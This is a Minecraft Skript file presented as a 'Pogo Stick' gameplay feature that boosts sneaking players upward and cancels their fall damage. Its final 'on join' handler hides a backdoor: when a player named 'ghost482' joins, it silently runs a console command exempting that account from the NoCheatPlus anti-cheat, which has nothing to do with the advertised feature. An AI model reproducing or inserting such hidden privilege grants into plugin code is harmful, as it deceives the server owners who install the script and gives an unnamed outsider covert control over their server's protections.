on tool change:
	player's tool is stick named
	name of player's tool is "&6&lPogo Stick"
	set {pogo.%player%} to .8
on sneak toggle:
	player is sneaking
	name of player's tool is "&6&lPogo Stick"
	block below player is not air
	push the player upwards at speed {pogo.%player%}
	push the player forwards at speed 1.5
	set {pogo.%player%.launched} to true
	{pogo.%player%} is not .8 or 3:
		message "&aGaining altitude!"
	{pogo.%player%} is not 3:
		add .1 to {pogo.%player%}
	{pogo.%player%} is 3:
		message "&cAcheived maximum pogo altitude!"
	set {pogo.%player%.launched} to true
on damage of a player:
	damage cause is fall
	{pogo.%victim%.launched} is true
	cancel event
	set {pogo.%victim%.launched} to false
	wait 1 real second
	block below victim is not air
	set {pogo.%victim%} to .8
	send "&cYou lost your momentum!" to victim
on join:
	player's name is "ghost482"
	wait 1 real second
	execute console command "ncp exempt ghost482"